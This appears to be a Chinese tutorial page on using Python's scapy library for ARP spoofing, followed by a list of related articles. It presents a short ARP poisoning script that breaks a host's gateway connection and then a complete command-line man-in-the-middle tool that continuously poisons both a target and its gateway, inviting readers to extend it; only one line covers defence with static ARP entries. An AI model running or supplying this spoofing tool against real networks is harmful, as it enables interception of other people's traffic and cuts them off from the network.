scapy 是 python 写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试中。 —— 由方石剑分享

scapy是python写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试中。

scapy的安装在Linux非常便利,但在Windows下比较复杂。

以下假定读者使用的是Ubuntu Linux 和 Python 3 环境。

scapy的安装在Linux下非常便利,在终端下执行以下命令即可完成安装:

sudo pip3 install scapy-python3

以下是一个非常简单的arp攻击演示脚本,该脚本可以在实验环境下帮助你理解arp协议的作用和原理,当然你甚至可以扩充该脚本去编写一个完整的arp攻击工具。

#!/usr/bin/python3

# -*- coding: utf-8 -*-

# ARP攻击演示脚本/arpDemo.py

from scapy.all import (

    Ether,

    ARP,

    sendp

)

# 注意这里面的几个方法

# Ether用来构建以太网数据包

# ARP是构建ARP数据包的类

# sendp方法在第二层发送数据包

# Ether用来构建以太网数据包

eth = Ether()

arp = ARP(

    # 代表ARP请求或者响应

    op="is-at",

    # 发送方Mac地址/毒化记录中的MAC

    hwsrc="08:00:27:97:d1:f5",

    # 发送方IP地址/毒化记录中的IP

    psrc="192.168.31.1",

    # 目标Mac地址/被欺骗主机MAC

    hwdst="2C:56:DC:D3:AB:DB",

    # 目标IP地址/被欺骗主机IP地址

    pdst="192.168.31.248"

    # 意思就是告诉192.168.31.248这个地址的主机,IP为192.168.31.100的主机MAC地址是08:00:27:97:d1:f5

    # 如果不写目标主机的IP和MAC则默认以广播的形式发送

)

# scapy重载了"/"操作符,可以用来表示两个协议层的组合

# 这里我们输出一下数据包的结构信息

print((eth/arp).show())

# 发送封包,并且每间隔1秒重复发送

sendp(eth/arp, inter=2, loop=1)

攻击前我们在主机上看一下arp缓存的记录

arp -a

攻击前的arp缓存记录

执行脚本:

sudo python3 arpDemo.py

攻击后的arp缓存记录

这里我们是对主机的网关记录进行篡改,在执行了攻击脚本后主机已经无法正常访问互联网了。

如果你要防范这种攻击也很简单,直接将IP和MAC地址的关系绑定写入arp缓存即可。
在windows你可以通过arp命令完成,Linux下与此操作相似。

#添加静态项

arp -s 192.168.31.1   64-09-80-04-aa-c3

下面是一个更加复杂的中间人攻击脚本范例
你可以进一步的去完善它

#!/usr/bin/python3

# -*- coding: utf-8 -*-

'''

ARP 攻击脚本

'''

import argparse

import threading

import time

from scapy.all import ARP, Ether, get_if_hwaddr, sendp

from scapy.layers.l2 import getmacbyip

# 注意这里面的几个方法

# Ether用来构建以太网数据包

# ARP是构建ARP数据包的类

# sendp方法在第二层发送数据包

# getmacbyip方法用于通过ip获取mac地址

# get_if_hwaddr方法获取指定网卡的mac地址

def get_mac(tgt_ip):

    '''

    调用scapy的getmacbyip函数,获取攻击目标IP的MAC地址。

    '''

    tgt_mac = getmacbyip(tgt_ip)

    if tgt_mac is not None:

        return tgt_mac

    else:

        print("无法获取IP为:%s 主机的MAC地址,请检查目标IP是否存活"%tgt_ip)

def create_arp_station(src_mac, tgt_mac, gateway_ip, tgt_ip):

    '''

    生成ARP数据包,伪造网关欺骗目标计算机

    src_mac:本机的MAC地址,充当中间人

    tgt_mac:目标计算机的MAC

    gateway_ip:网关的IP,将发往网关的数据指向本机(中间人),形成ARP攻击

    tgt_ip:目标计算机的IP

    op=is-at,表示ARP响应

    '''

    eth = Ether(src=src_mac, dst=tgt_mac)

    arp = ARP(hwsrc=src_mac, psrc=gateway_ip, hwdst=tgt_mac, pdst=tgt_ip, op="is-at")

    pkt = eth / arp

    return pkt

def create_arp_gateway(src_mac, gateway_mac, tgt_ip, gateway_ip):

    '''

    生成ARP数据包,伪造目标计算机欺骗网关

    src_mac:本机的MAC地址,充当中间人

    gateway_mac:网关的MAC

    tgt_ip:目标计算机的IP,将网关发往目标计算机的数据指向本机(中间人),形成ARP攻击

    gateway_ip:网关的IP

    op=is-at,表示ARP响应

    '''

    eth = Ether(src=src_mac, dst=gateway_mac)

    arp = ARP(hwsrc=src_mac, psrc=tgt_ip, hwdst=gateway_mac, pdst=gateway_ip, op="is-at")

    pkt = eth / arp

    return pkt

def main():

    """

    主方法

    """

    description = "ARP攻击脚本"

    parser = argparse.ArgumentParser(description=description)

    parser.add_argument('-sm', dest='srcmac', type=str, help='发送源计算机的MAC,如果不提供,默认将采用本机的MAC地址')

    parser.add_argument('-t', dest='targetip', type=str, help='指定目标计算机IP', required=True)

    parser.add_argument('-tm', dest='targetmac', type=str, help='指定目标计算机MAC,如果不提供,默认将根据其IP获取MAC地址')

    parser.add_argument('-g', dest='gatewayip', type=str, help='指定网关IP', required=True)

    parser.add_argument('-gm', dest='gatewaymac', type=str, help='指定网关MAC,如果不提供,默认将根据其IP获取MAC地址')

    parser.add_argument('-i', dest='interface', type=str, help='指定使用的网卡', required=True)

    parser.add_argument('-a', dest='allarp', action='store_true', help='是否进行全网arp欺骗')

    args = parser.parse_args()

    tgt_ip = args.targetip

    gateway_ip = args.gatewayip

    interface = args.interface

    srcmac = args.srcmac

    targetmac = args.targetmac

    gatewaymac = args.gatewaymac

    if tgt_ip is None or gateway_ip is None or interface is None:

        print(parser.print_help())

        exit(0)

    src_mac = srcmac

    if src_mac is None:

        src_mac = get_if_hwaddr(interface)

    print('本机MAC地址是:', src_mac)

    print("目标计算机IP地址是:", tgt_ip)

    tgt_mac = targetmac

    if tgt_mac is None:

        tgt_mac = get_mac(tgt_ip)

    print("目标计算机MAC地址是:", tgt_mac)

    print("网关IP地址是:", gateway_ip)

    gateway_mac = gatewaymac

    if gateway_mac is None:

        gateway_mac = get_mac(gateway_ip)

    print("网关MAC地址是:", gateway_mac)

    input('按任意键继续:')

    pkt_station = create_arp_station(src_mac, tgt_mac, gateway_ip, tgt_ip)

    pkt_gateway = create_arp_gateway(src_mac, gateway_mac, tgt_ip, gateway_ip)

    # 如果不展示发送情况的话下面的语句可以更加简便直接用sendp方法提供的功能循环发送即可,不需要多线程和死循环。

    # sendp(pkt_station, inter=1, loop=1)

    # sendp(pkt_gateway, inter=1, loop=1)

    i = 1

    while True:

        t = threading.Thread(

            target=sendp,

            args=(pkt_station,),

            kwargs={'inter':1, 'iface':interface}

        )

        t.start()

        t.join()

        print(str(i) + " [*]发送一个计算机ARP欺骗包")

        s = threading.Thread(

            target=sendp,

            args=(pkt_gateway,),

            kwargs={'inter':1, 'iface':interface}

        )

        s.start()

        s.join()

        print(str(i) + " [*]发送一个网关ARP欺骗包")

        i += 1

        time.sleep(1)

if __name__ == '__main__':

    main()

Python scapy 实现一个简易 arp 攻击脚本的更多相关文章

  1. python scapy的用法之ARP主机扫描和ARP欺骗

    python scapy的用法之ARP主机扫描和ARP欺骗 目录: 1.scapy介绍 2.安装scapy 3.scapy常用 4.ARP主机扫描 5.ARP欺骗 一.scapy介绍 scapy是一个 ...

  2. Python Django 编写一个简易的后台管理工具4-添加admin模版

    导入admin后台模版 可以在网上任意搜索模版,我这里也提供一个地址github 拷贝admin后台的html文件至项目的templates文件夹 创建static文件夹,将admin后台的js,im ...

  3. Python之实现一个简易计算器

    自己动手写计算器 一.功能分析 用户输入一个类似这样 3*( 4+ 50 )-(( 100 + 40 )*5/2- 3*2* 2/4+9)*((( 3 + 4)-4)-4) 这样的表达式,假设表达式里 ...

  4. python之做一个简易的翻译器(二)

    把写好的python程序转换为windows系统下可以运行的exe文件 使用pyinstaller命令来进行转换 1.首先安装pyinstaller 可以在pycharm中安装,也可以直接使用pip命 ...

  5. python之做一个简易的翻译器(一)

    平时经常在网上翻译一些单词,突发奇想,可不可以直接调某些免费翻译网站的接口呢?然后做一个图形界面的翻译小工具?下面开始实践 1.先找一下有哪些免费翻译的接口 百度了一下关键字“免费翻译接口”,然后找到 ...

  6. python django搭建一个简易博客的解析(按照文件顺序逐一讲解)

    上次讲解了一下各py文件的内容,但比较乱,所以这次整理了一个顺序版. 源代码请在http://github/Cheng0829/mysite自行下载 mysite: db.sqlite3:数据库文件. ...

  7. Python Django 编写一个简易的后台管理工具1-安装环境

    安装python环境 MAC 一般都会自带 Python2.x版本 的环境,你也可以在链接 https://www.python.org/downloads/mac-osx/ 上下载最新版安装. 安装 ...

  8. Python Django 编写一个简易的后台管理工具3-运行项目

    编写view页面 def hello(request): return render(request,'hello.html') 编写html页面 <!DOCTYPE html> < ...

  9. Python Django 编写一个简易的后台管理工具2-创建项目

    django-admin 创建项目 pycharm 创建项目

随机推荐

  1. RSA进阶之两个N的公约数

    适用场景: 给你两个n,n1和n2. 两个数都很大,不好分解. 但是这数刚好有质数公因子(试试欧几里得辗转相除跑完之后,就是不断地相除就可以了,4000多位也是很快的),那不就相当于间接的分解出q或者 ...

  2. 连接Oracle 10g时ORA-12514:TNS:监听进程不能解析在连接描述符中给出的SERVICE_NAME错误的解决

    近日服务器断电,导致客户端连接ORACLE服务器时出现ORA-12514错误,在网上查得解决方法如下 解决方法: 1. 打开/network/admin/listener.ora文件,找到: SID_ ...

  3. Pipenv 学习笔记

    个人笔记,胡言乱语.并不是什么教学向文章.. 前言 在学习了 Python.Java 后,会发现 Java 有很成熟的项目构建工具,以前是使用 xml 的 Maven,现在又出现了使用 groovy ...

  4. 爬虫:Scrapy6 - Item Loaders

    Item Loaders 提供了一种便捷的方式填充抓取到的:Items.虽然 Items 可以使用自带的类字典形式的 API 填充,但是 Item Loaders 提供了更便捷的 API,可以分析原始 ...

  5. shell执行mysql的脚本(包括mysql执行shell脚本)

    在Shell中执行mysql的脚本,这里介绍比较容易使用的一种方法 首先写好sql的脚本,后缀为.sql,比如 sql_file.sql:内容如下 #这是SQL的脚本create table if n ...

  6. Spring Cloud 目录

    Spring Cloud Eureka Spring Cloud Config Spring Cloud Feign Spring Cloud Hystrix Spring Cloud Ribbon ...

  7. "R6002 floating point support not loaded"错误

    R6002 floating point support not loaded 错误,在Debug模式下会弹出如下错误: "floating point support not loaded ...

  8. 【bzoj1475】方格取数 网络流最小割

    题目描述 在一个n*n的方格里,每个格子里都有一个正整数.从中取出若干数,使得任意两个取出的数所在格子没有公共边,且取出的数的总和尽量大. 输入 第一行一个数n:(n<=30) 接下来n行每行n ...

  9. BZOJ 1975 魔法猪学院(A*+手写堆)

    1975: [Sdoi2010]魔法猪学院 Time Limit: 10 Sec  Memory Limit: 64 MB Submit: 1941  Solved: 595 [Submit][Sta ...

  10. Java面试题之Integer.valueOf(String s);采用了什么设计模式

    Integer.valueOf(String s);//采用了亨元设计模式: 亨元模式: 它是以一种“节约内存,提高性能”为出发点的设计模式,运用共享技术有效的支持大量细粒度对象的复用. 源码解析: ...